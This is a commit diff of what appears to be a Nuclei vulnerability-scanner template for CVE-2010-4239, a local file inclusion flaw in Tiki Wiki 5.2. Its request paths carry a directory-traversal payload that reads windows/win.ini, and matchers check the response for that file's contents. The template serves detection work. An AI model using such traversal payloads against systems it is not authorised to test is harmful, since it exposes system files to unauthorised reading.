Update and rename CVE-2010-4239.yaml to cves/2010/CVE-2010-4239.yaml
parent
d118190b3a
commit
b3c4935a68
|
@ -6,8 +6,8 @@ info:
|
|||
severity: high
|
||||
description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion
|
||||
reference:
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4239
|
||||
- https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4239
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
@ -18,14 +18,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
|
||||
- "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue